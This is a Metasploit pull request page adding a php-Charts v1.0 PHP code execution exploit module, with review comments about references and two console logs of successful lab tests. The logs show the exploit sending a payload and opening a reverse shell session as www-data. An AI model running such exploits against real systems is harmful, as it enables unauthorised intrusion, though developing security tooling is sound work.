Add php-Charts v1.0 PHP Code Execution Exploit #1341

Merged
merged 3 commits into from Jan 20, 2013

@bcoles bcoles commented Jan 20, 2013

Add php-Charts v1.0 PHP Code Execution Vulnerability exploit module

],
'References' =>
[
['URL', 'http://www.exploit-db.com/exploits/24201/'],

@jvazquez-r7 jvazquez-r7 Jan 20, 2013

It's an EDB reference, not URL

@jvazquez-r7 jvazquez-r7 Jan 20, 2013

There is also an OSVDB reference for this vulnerability: http://www.osvdb.org/show/osvdb/89334 , could you please add the reference?

@jvazquez-r7 jvazquez-r7 commented Jan 20, 2013

Tested successfully:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > check
[*] 192.168.1.154:80 - Sending check
[+] The target is vulnerable.
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sQkJsNt3VTXIrM6l;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sQkJsNt3VTXIrM6l\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46786) at 2013-01-20 17:11:45 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Once comments are fixed I think we'll be ready to merge it :-)

@jvazquez-r7 jvazquez-r7 merged commit dc318c5 into rapid7:master Jan 20, 2013

@jvazquez-r7 jvazquez-r7 commented Jan 20, 2013

Thanks,

Test after changes:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > exploit
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[*] Accepted the first client connection...
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the second client connection...
[*] Command: echo D0GYAZBZleRafqnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "D0GYAZBZleRafqnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46790) at 2013-01-20 17:36:30 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Merged after updating references and disclosure date!
